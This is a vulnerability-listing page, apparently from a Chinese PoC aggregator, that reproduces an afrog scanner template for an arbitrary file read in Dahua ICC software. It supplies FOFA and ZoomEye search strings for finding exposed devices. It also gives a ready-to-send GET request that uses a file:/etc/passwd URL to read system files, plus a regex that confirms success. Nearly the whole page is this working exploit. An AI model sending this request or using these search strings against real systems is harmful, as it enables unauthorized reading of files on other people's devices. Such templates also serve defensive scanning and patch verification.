dahua-icc-readpic-fileread: Dahua Icc Readpic File Read

日期: 2025-09-01 | 影响软件: Dahua Icc Readpic File Read | POC: 已公开

漏洞描述

Read Dahua Icc file FOFA: body="*客户端会小于800*" ZoomEye: *客户端会小于800*

PoC代码[已公开]

id: dahua-icc-readpic-fileread

info:
  name: Dahua Icc Readpic File Read
  author: zan8in
  severity: high
  verified: true
  description: |-
    Read Dahua Icc file
    FOFA: body="*客户端会小于800*"
    ZoomEye: *客户端会小于800*
  tags: dahua,fileread
  created: 2023/11/01

rules:
  r0:
    request:
      mehtod: GET
      path: /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-readpic-fileread.yaml

相关漏洞推荐